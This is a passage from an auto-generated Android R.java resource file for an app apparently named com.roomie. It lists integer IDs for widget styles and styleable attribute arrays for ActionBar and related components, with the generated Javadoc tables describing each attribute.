public static final int Widget_AppCompat_ActionButton=0x7f0e011e; public static final int Widget_AppCompat_ActionButton_CloseMode=0x7f0e011f; public static final int Widget_AppCompat_ActionButton_Overflow=0x7f0e0120; public static final int Widget_AppCompat_ActionMode=0x7f0e0121; public static final int Widget_AppCompat_ActivityChooserView=0x7f0e0122; public static final int Widget_AppCompat_AutoCompleteTextView=0x7f0e0123; public static final int Widget_AppCompat_Button=0x7f0e0124; public static final int Widget_AppCompat_Button_Borderless=0x7f0e0125; public static final int Widget_AppCompat_Button_Borderless_Colored=0x7f0e0126; public static final int Widget_AppCompat_Button_ButtonBar_AlertDialog=0x7f0e0127; public static final int Widget_AppCompat_Button_Colored=0x7f0e0128; public static final int Widget_AppCompat_Button_Small=0x7f0e0129; public static final int Widget_AppCompat_ButtonBar=0x7f0e012a; public static final int Widget_AppCompat_ButtonBar_AlertDialog=0x7f0e012b; public static final int Widget_AppCompat_CompoundButton_CheckBox=0x7f0e012c; public static final int Widget_AppCompat_CompoundButton_RadioButton=0x7f0e012d; public static final int Widget_AppCompat_CompoundButton_Switch=0x7f0e012e; public static final int Widget_AppCompat_DrawerArrowToggle=0x7f0e012f; public static final int Widget_AppCompat_DropDownItem_Spinner=0x7f0e0130; public static final int Widget_AppCompat_EditText=0x7f0e0131; public static final int Widget_AppCompat_ImageButton=0x7f0e0132; public static final int Widget_AppCompat_Light_ActionBar=0x7f0e0133; public static final int Widget_AppCompat_Light_ActionBar_Solid=0x7f0e0134; public static final int Widget_AppCompat_Light_ActionBar_Solid_Inverse=0x7f0e0135; public static final int Widget_AppCompat_Light_ActionBar_TabBar=0x7f0e0136; public static final int Widget_AppCompat_Light_ActionBar_TabBar_Inverse=0x7f0e0137; public static final int Widget_AppCompat_Light_ActionBar_TabText=0x7f0e0138; public static final int Widget_AppCompat_Light_ActionBar_TabText_Inverse=0x7f0e0139; public static final int Widget_AppCompat_Light_ActionBar_TabView=0x7f0e013a; public static final int Widget_AppCompat_Light_ActionBar_TabView_Inverse=0x7f0e013b; public static final int Widget_AppCompat_Light_ActionButton=0x7f0e013c; public static final int Widget_AppCompat_Light_ActionButton_CloseMode=0x7f0e013d; public static final int Widget_AppCompat_Light_ActionButton_Overflow=0x7f0e013e; public static final int Widget_AppCompat_Light_ActionMode_Inverse=0x7f0e013f; public static final int Widget_AppCompat_Light_ActivityChooserView=0x7f0e0140; public static final int Widget_AppCompat_Light_AutoCompleteTextView=0x7f0e0141; public static final int Widget_AppCompat_Light_DropDownItem_Spinner=0x7f0e0142; public static final int Widget_AppCompat_Light_ListPopupWindow=0x7f0e0143; public static final int Widget_AppCompat_Light_ListView_DropDown=0x7f0e0144; public static final int Widget_AppCompat_Light_PopupMenu=0x7f0e0145; public static final int Widget_AppCompat_Light_PopupMenu_Overflow=0x7f0e0146; public static final int Widget_AppCompat_Light_SearchView=0x7f0e0147; public static final int Widget_AppCompat_Light_Spinner_DropDown_ActionBar=0x7f0e0148; public static final int Widget_AppCompat_ListMenuView=0x7f0e0149; public static final int Widget_AppCompat_ListPopupWindow=0x7f0e014a; public static final int Widget_AppCompat_ListView=0x7f0e014b; public static final int Widget_AppCompat_ListView_DropDown=0x7f0e014c; public static final int Widget_AppCompat_ListView_Menu=0x7f0e014d; public static final int Widget_AppCompat_PopupMenu=0x7f0e014e; public static final int Widget_AppCompat_PopupMenu_Overflow=0x7f0e014f; public static final int Widget_AppCompat_PopupWindow=0x7f0e0150; public static final int Widget_AppCompat_ProgressBar=0x7f0e0151; public static final int Widget_AppCompat_ProgressBar_Horizontal=0x7f0e0152; public static final int Widget_AppCompat_RatingBar=0x7f0e0153; public static final int Widget_AppCompat_RatingBar_Indicator=0x7f0e0154; public static final int Widget_AppCompat_RatingBar_Small=0x7f0e0155; public static final int Widget_AppCompat_SearchView=0x7f0e0156; public static final int Widget_AppCompat_SearchView_ActionBar=0x7f0e0157; public static final int Widget_AppCompat_SeekBar=0x7f0e0158; public static final int Widget_AppCompat_SeekBar_Discrete=0x7f0e0159; public static final int Widget_AppCompat_Spinner=0x7f0e015a; public static final int Widget_AppCompat_Spinner_DropDown=0x7f0e015b; public static final int Widget_AppCompat_Spinner_DropDown_ActionBar=0x7f0e015c; public static final int Widget_AppCompat_Spinner_Underlined=0x7f0e015d; public static final int Widget_AppCompat_TextView_SpinnerItem=0x7f0e015e; public static final int Widget_AppCompat_Toolbar=0x7f0e015f; public static final int Widget_AppCompat_Toolbar_Button_Navigation=0x7f0e0160; public static final int Widget_Compat_NotificationActionContainer=0x7f0e01fc; public static final int Widget_Compat_NotificationActionText=0x7f0e01fd; public static final int Widget_Design_AppBarLayout=0x7f0e01ca; public static final int Widget_Design_BottomNavigationView=0x7f0e01cb; public static final int Widget_Design_BottomSheet_Modal=0x7f0e01cc; public static final int Widget_Design_CollapsingToolbar=0x7f0e01cd; public static final int Widget_Design_FloatingActionButton=0x7f0e01ce; public static final int Widget_Design_NavigationView=0x7f0e01cf; public static final int Widget_Design_ScrimInsetsFrameLayout=0x7f0e01d0; public static final int Widget_Design_Snackbar=0x7f0e01d1; public static final int Widget_Design_TabLayout=0x7f0e0166; public static final int Widget_Design_TextInputLayout=0x7f0e01d2; public static final int Widget_MaterialComponents_BottomAppBar=0x7f0e01d3; public static final int Widget_MaterialComponents_BottomAppBar_Colored=0x7f0e01d4; public static final int Widget_MaterialComponents_BottomNavigationView=0x7f0e01d5; public static final int Widget_MaterialComponents_BottomNavigationView_Colored=0x7f0e01d6; public static final int Widget_MaterialComponents_BottomSheet_Modal=0x7f0e01d7; public static final int Widget_MaterialComponents_Button=0x7f0e01d8; public static final int Widget_MaterialComponents_Button_Icon=0x7f0e01d9; public static final int Widget_MaterialComponents_Button_OutlinedButton=0x7f0e01da; public static final int Widget_MaterialComponents_Button_OutlinedButton_Icon=0x7f0e01db; public static final int Widget_MaterialComponents_Button_TextButton=0x7f0e01dc; public static final int Widget_MaterialComponents_Button_TextButton_Dialog=0x7f0e01dd; /** Icon text button has the same padding as a regular text button */ public static final int Widget_MaterialComponents_Button_TextButton_Dialog_Icon=0x7f0e01de; /** Icon text button has the same padding as a regular text button */ public static final int Widget_MaterialComponents_Button_TextButton_Icon=0x7f0e01df; public static final int Widget_MaterialComponents_Button_UnelevatedButton=0x7f0e01e0; public static final int Widget_MaterialComponents_Button_UnelevatedButton_Icon=0x7f0e01e1; public static final int Widget_MaterialComponents_CardView=0x7f0e01e2; public static final int Widget_MaterialComponents_Chip_Action=0x7f0e01e3; public static final int Widget_MaterialComponents_Chip_Choice=0x7f0e01e4; public static final int Widget_MaterialComponents_Chip_Entry=0x7f0e01e5; public static final int Widget_MaterialComponents_Chip_Filter=0x7f0e01e6; public static final int Widget_MaterialComponents_ChipGroup=0x7f0e01e7; public static final int Widget_MaterialComponents_FloatingActionButton=0x7f0e01e8; public static final int Widget_MaterialComponents_NavigationView=0x7f0e01e9; public static final int Widget_MaterialComponents_Snackbar=0x7f0e01ea; public static final int Widget_MaterialComponents_Snackbar_FullWidth=0x7f0e01eb; public static final int Widget_MaterialComponents_TabLayout=0x7f0e01ec; public static final int Widget_MaterialComponents_TabLayout_Colored=0x7f0e01ed; public static final int Widget_MaterialComponents_TextInputEditText_FilledBox=0x7f0e01ee; public static final int Widget_MaterialComponents_TextInputEditText_FilledBox_Dense=0x7f0e01ef; public static final int Widget_MaterialComponents_TextInputEditText_OutlinedBox=0x7f0e01f0; public static final int Widget_MaterialComponents_TextInputEditText_OutlinedBox_Dense=0x7f0e01f1; public static final int Widget_MaterialComponents_TextInputLayout_FilledBox=0x7f0e01f2; public static final int Widget_MaterialComponents_TextInputLayout_FilledBox_Dense=0x7f0e01f3; public static final int Widget_MaterialComponents_TextInputLayout_OutlinedBox=0x7f0e01f4; public static final int Widget_MaterialComponents_TextInputLayout_OutlinedBox_Dense=0x7f0e01f5; public static final int Widget_MaterialComponents_Toolbar=0x7f0e01f6; public static final int Widget_MediaRouter_Light_MediaRouteButton=0x7f0e0009; public static final int Widget_MediaRouter_MediaRouteButton=0x7f0e000a; public static final int Widget_Support_CoordinatorLayout=0x7f0e01f7; } public static final class xml { public static final int xamarin_essentials_fileprovider_file_paths=0x7f080000; } public static final class styleable { /** Attributes that can be used with a ActionBar. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #ActionBar_background com.roomie:background}</code></td><td> Specifies a background drawable for the action bar.</td></tr> <tr><td><code>{@link #ActionBar_backgroundSplit com.roomie:backgroundSplit}</code></td><td> Specifies a background drawable for the bottom component of a split action bar.</td></tr> <tr><td><code>{@link #ActionBar_backgroundStacked com.roomie:backgroundStacked}</code></td><td> Specifies a background drawable for a second stacked row of the action bar.</td></tr> <tr><td><code>{@link #ActionBar_contentInsetEnd com.roomie:contentInsetEnd}</code></td><td> Minimum inset for content views within a bar.</td></tr> <tr><td><code>{@link #ActionBar_contentInsetEndWithActions com.roomie:contentInsetEndWithActions}</code></td><td> Minimum inset for content views within a bar when actions from a menu are present.</td></tr> <tr><td><code>{@link #ActionBar_contentInsetLeft com.roomie:contentInsetLeft}</code></td><td> Minimum inset for content views within a bar.</td></tr> <tr><td><code>{@link #ActionBar_contentInsetRight com.roomie:contentInsetRight}</code></td><td> Minimum inset for content views within a bar.</td></tr> <tr><td><code>{@link #ActionBar_contentInsetStart com.roomie:contentInsetStart}</code></td><td> Minimum inset for content views within a bar.</td></tr> <tr><td><code>{@link #ActionBar_contentInsetStartWithNavigation com.roomie:contentInsetStartWithNavigation}</code></td><td> Minimum inset for content views within a bar when a navigation button is present, such as the Up button.</td></tr> <tr><td><code>{@link #ActionBar_customNavigationLayout com.roomie:customNavigationLayout}</code></td><td> Specifies a layout for custom navigation.</td></tr> <tr><td><code>{@link #ActionBar_displayOptions com.roomie:displayOptions}</code></td><td> Options affecting how the action bar is displayed.</td></tr> <tr><td><code>{@link #ActionBar_divider com.roomie:divider}</code></td><td> Specifies the drawable used for item dividers.</td></tr> <tr><td><code>{@link #ActionBar_elevation com.roomie:elevation}</code></td><td> Elevation for the action bar itself </td></tr> <tr><td><code>{@link #ActionBar_height com.roomie:height}</code></td><td> Specifies a fixed height.</td></tr> <tr><td><code>{@link #ActionBar_hideOnContentScroll com.roomie:hideOnContentScroll}</code></td><td> Set true to hide the action bar on a vertical nested scroll of content.</td></tr> <tr><td><code>{@link #ActionBar_homeAsUpIndicator com.roomie:homeAsUpIndicator}</code></td><td> Up navigation glyph </td></tr> <tr><td><code>{@link #ActionBar_homeLayout com.roomie:homeLayout}</code></td><td> Specifies a layout to use for the "home" section of the action bar.</td></tr> <tr><td><code>{@link #ActionBar_icon com.roomie:icon}</code></td><td> Specifies the drawable used for the application icon.</td></tr> <tr><td><code>{@link #ActionBar_indeterminateProgressStyle com.roomie:indeterminateProgressStyle}</code></td><td> Specifies a style resource to use for an indeterminate progress spinner.</td></tr> <tr><td><code>{@link #ActionBar_itemPadding com.roomie:itemPadding}</code></td><td> Specifies padding that should be applied to the left and right sides of system-provided items in the bar.</td></tr> <tr><td><code>{@link #ActionBar_logo com.roomie:logo}</code></td><td> Specifies the drawable used for the application logo.</td></tr> <tr><td><code>{@link #ActionBar_navigationMode com.roomie:navigationMode}</code></td><td> The type of navigation to use.</td></tr> <tr><td><code>{@link #ActionBar_popupTheme com.roomie:popupTheme}</code></td><td> Reference to a theme that should be used to inflate popups shown by widgets in the action bar.</td></tr> <tr><td><code>{@link #ActionBar_progressBarPadding com.roomie:progressBarPadding}</code></td><td> Specifies the horizontal padding on either end for an embedded progress bar.</td></tr> <tr><td><code>{@link #ActionBar_progressBarStyle com.roomie:progressBarStyle}</code></td><td> Specifies a style resource to use for an embedded progress bar.</td></tr> <tr><td><code>{@link #ActionBar_subtitle com.roomie:subtitle}</code></td><td> Specifies subtitle text used for navigationMode="normal" </td></tr> <tr><td><code>{@link #ActionBar_subtitleTextStyle com.roomie:subtitleTextStyle}</code></td><td> Specifies a style to use for subtitle text.</td></tr> <tr><td><code>{@link #ActionBar_title com.roomie:title}</code></td><td> Specifies title text used for navigationMode="normal" </td></tr> <tr><td><code>{@link #ActionBar_titleTextStyle com.roomie:titleTextStyle}</code></td><td> Specifies a style to use for title text.</td></tr> </table> @see #ActionBar_background @see #ActionBar_backgroundSplit @see #ActionBar_backgroundStacked @see #ActionBar_contentInsetEnd @see #ActionBar_contentInsetEndWithActions @see #ActionBar_contentInsetLeft @see #ActionBar_contentInsetRight @see #ActionBar_contentInsetStart @see #ActionBar_contentInsetStartWithNavigation @see #ActionBar_customNavigationLayout @see #ActionBar_displayOptions @see #ActionBar_divider @see #ActionBar_elevation @see #ActionBar_height @see #ActionBar_hideOnContentScroll @see #ActionBar_homeAsUpIndicator @see #ActionBar_homeLayout @see #ActionBar_icon @see #ActionBar_indeterminateProgressStyle @see #ActionBar_itemPadding @see #ActionBar_logo @see #ActionBar_navigationMode @see #ActionBar_popupTheme @see #ActionBar_progressBarPadding @see #ActionBar_progressBarStyle @see #ActionBar_subtitle @see #ActionBar_subtitleTextStyle @see #ActionBar_title @see #ActionBar_titleTextStyle */ public static final int[] ActionBar = { 0x7f01002a, 0x7f01002c, 0x7f01002d, 0x7f01002e, 0x7f01002f, 0x7f010030, 0x7f010031, 0x7f010032, 0x7f010033, 0x7f010034, 0x7f010035, 0x7f010036, 0x7f010037, 0x7f010038, 0x7f010039, 0x7f01003a, 0x7f01003b, 0x7f01003c, 0x7f01003d, 0x7f01003e, 0x7f01003f, 0x7f010040, 0x7f010041, 0x7f010042, 0x7f010043, 0x7f010044, 0x7f010045, 0x7f010046, 0x7f010091 }; /** <p> @attr description Specifies a background drawable for the action bar. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:background */ public static final int ActionBar_background = 10; /** <p> @attr description Specifies a background drawable for the bottom component of a split action bar. <p>May be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>May be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This is a private symbol. @attr name com.roomie:backgroundSplit */ public static final int ActionBar_backgroundSplit = 12; /** <p> @attr description Specifies a background drawable for a second stacked row of the action bar. <p>May be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>May be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This is a private symbol. @attr name com.roomie:backgroundStacked */ public static final int ActionBar_backgroundStacked = 11; /** <p> @attr description Minimum inset for content views within a bar. Navigation buttons and menu views are excepted. Only valid for some themes and configurations. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:contentInsetEnd */ public static final int ActionBar_contentInsetEnd = 21; /** <p> @attr description Minimum inset for content views within a bar when actions from a menu are present. Only valid for some themes and configurations. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:contentInsetEndWithActions */ public static final int ActionBar_contentInsetEndWithActions = 25; /** <p> @attr description Minimum inset for content views within a bar. Navigation buttons and menu views are excepted. Only valid for some themes and configurations. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:contentInsetLeft */ public static final int ActionBar_contentInsetLeft = 22; /** <p> @attr description Minimum inset for content views within a bar. Navigation buttons and menu views are excepted. Only valid for some themes and configurations. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:contentInsetRight */ public static final int ActionBar_contentInsetRight = 23; /** <p> @attr description Minimum inset for content views within a bar. Navigation buttons and menu views are excepted. Only valid for some themes and configurations. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:contentInsetStart */ public static final int ActionBar_contentInsetStart = 20; /** <p> @attr description Minimum inset for content views within a bar when a navigation button is present, such as the Up button. Only valid for some themes and configurations. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:contentInsetStartWithNavigation */ public static final int ActionBar_contentInsetStartWithNavigation = 24; /** <p> @attr description Specifies a layout for custom navigation. Overrides navigationMode. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:customNavigationLayout */ public static final int ActionBar_customNavigationLayout = 13; /** <p> @attr description Options affecting how the action bar is displayed. <p>Must be one or more (separated by '|') of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>none</code></td><td>0</td><td></td></tr> <tr><td><code>useLogo</code></td><td>0x1</td><td></td></tr> <tr><td><code>showHome</code></td><td>0x2</td><td></td></tr> <tr><td><code>homeAsUp</code></td><td>0x4</td><td></td></tr> <tr><td><code>showTitle</code></td><td>0x8</td><td></td></tr> <tr><td><code>showCustom</code></td><td>0x10</td><td></td></tr> <tr><td><code>disableHome</code></td><td>0x20</td><td></td></tr> </table> <p>This is a private symbol. @attr name com.roomie:displayOptions */ public static final int ActionBar_displayOptions = 3; /** <p> @attr description Specifies the drawable used for item dividers. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:divider */ public static final int ActionBar_divider = 9; /** <p> @attr description Elevation for the action bar itself <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:elevation */ public static final int ActionBar_elevation = 26; /** <p> @attr description Specifies a fixed height. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:height */ public static final int ActionBar_height = 0; /** <p> @attr description Set true to hide the action bar on a vertical nested scroll of content. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:hideOnContentScroll */ public static final int ActionBar_hideOnContentScroll = 19; /** <p> @attr description Up navigation glyph <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:homeAsUpIndicator */ public static final int ActionBar_homeAsUpIndicator = 28; /** <p> @attr description Specifies a layout to use for the "home" section of the action bar. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:homeLayout */ public static final int ActionBar_homeLayout = 14; /** <p> @attr description Specifies the drawable used for the application icon. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:icon */ public static final int ActionBar_icon = 7; /** <p> @attr description Specifies a style resource to use for an indeterminate progress spinner. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:indeterminateProgressStyle */ public static final int ActionBar_indeterminateProgressStyle = 16; /** <p> @attr description Specifies padding that should be applied to the left and right sides of system-provided items in the bar. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:itemPadding */ public static final int ActionBar_itemPadding = 18; /** <p> @attr description Specifies the drawable used for the application logo. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:logo */ public static final int ActionBar_logo = 8; /** <p> @attr description The type of navigation to use. <p>Must be one of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>normal</code></td><td>0</td><td> Normal static title text </td></tr> <tr><td><code>listMode</code></td><td>1</td><td> The action bar will use a selection list for navigation. </td></tr> <tr><td><code>tabMode</code></td><td>2</td><td> The action bar will use a series of horizontal tabs for navigation. </td></tr> </table> <p>This is a private symbol. @attr name com.roomie:navigationMode */ public static final int ActionBar_navigationMode = 2; /** <p> @attr description Reference to a theme that should be used to inflate popups shown by widgets in the action bar. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:popupTheme */ public static final int ActionBar_popupTheme = 27; /** <p> @attr description Specifies the horizontal padding on either end for an embedded progress bar. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:progressBarPadding */ public static final int ActionBar_progressBarPadding = 17; /** <p> @attr description Specifies a style resource to use for an embedded progress bar. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:progressBarStyle */ public static final int ActionBar_progressBarStyle = 15; /** <p> @attr description Specifies subtitle text used for navigationMode="normal" <p>Must be a string value, using '\\;' to escape characters such as '\\n' or '\\uxxxx' for a unicode character. <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:subtitle */ public static final int ActionBar_subtitle = 4; /** <p> @attr description Specifies a style to use for subtitle text. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:subtitleTextStyle */ public static final int ActionBar_subtitleTextStyle = 6; /** <p> @attr description Specifies title text used for navigationMode="normal" <p>Must be a string value, using '\\;' to escape characters such as '\\n' or '\\uxxxx' for a unicode character. <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:title */ public static final int ActionBar_title = 1; /** <p> @attr description Specifies a style to use for title text. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:titleTextStyle */ public static final int ActionBar_titleTextStyle = 5; /** Attributes that can be used with a ActionBarLayout. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #ActionBarLayout_android_layout_gravity android:layout_gravity}</code></td><td></td></tr> </table> @see #ActionBarLayout_android_layout_gravity */ public static final int[] ActionBarLayout = { 0x010100b3 }; /** <p>This symbol is the offset where the {@link android.R.attr#layout_gravity} attribute's value can be found in the {@link #ActionBarLayout} array. @attr name android:layout_gravity */ public static final int ActionBarLayout_android_layout_gravity = 0; /** Attributes that can be used with a ActionMenuItemView. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #ActionMenuItemView_android_minWidth android:minWidth}</code></td><td></td></tr> </table> @see #ActionMenuItemView_android_minWidth */ public static final int[] ActionMenuItemView = { 0x0101013f }; /** <p>This symbol is the offset where the {@link android.R.attr#minWidth} attribute's value can be found in the {@link #ActionMenuItemView} array. @attr name android:minWidth */ public static final int ActionMenuItemView_android_minWidth = 0; /** Size of padding on either end of a divider. */ public static final int[] ActionMenuView = { }; /** Attributes that can be used with a ActionMode. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #ActionMode_background com.roomie:background}</code></td><td> Specifies a background for the action mode bar.</td></tr> <tr><td><code>{@link #ActionMode_backgroundSplit com.roomie:backgroundSplit}</code></td><td> Specifies a background for the split action mode bar.</td></tr> <tr><td><code>{@link #ActionMode_closeItemLayout com.roomie:closeItemLayout}</code></td><td> Specifies a layout to use for the "close" item at the starting edge.</td></tr> <tr><td><code>{@link #ActionMode_height com.roomie:height}</code></td><td> Specifies a fixed height for the action mode bar.</td></tr> <tr><td><code>{@link #ActionMode_subtitleTextStyle com.roomie:subtitleTextStyle}</code></td><td> Specifies a style to use for subtitle text.</td></tr> <tr><td><code>{@link #ActionMode_titleTextStyle com.roomie:titleTextStyle}</code></td><td> Specifies a style to use for title text.</td></tr> </table> @see #ActionMode_background @see #ActionMode_backgroundSplit @see #ActionMode_closeItemLayout @see #ActionMode_height @see #ActionMode_subtitleTextStyle @see #ActionMode_titleTextStyle */ public static final int[] ActionMode = { 0x7f01002a, 0x7f010030, 0x7f010031, 0x7f010035, 0x7f010037, 0x7f010047 }; /** <p> @attr 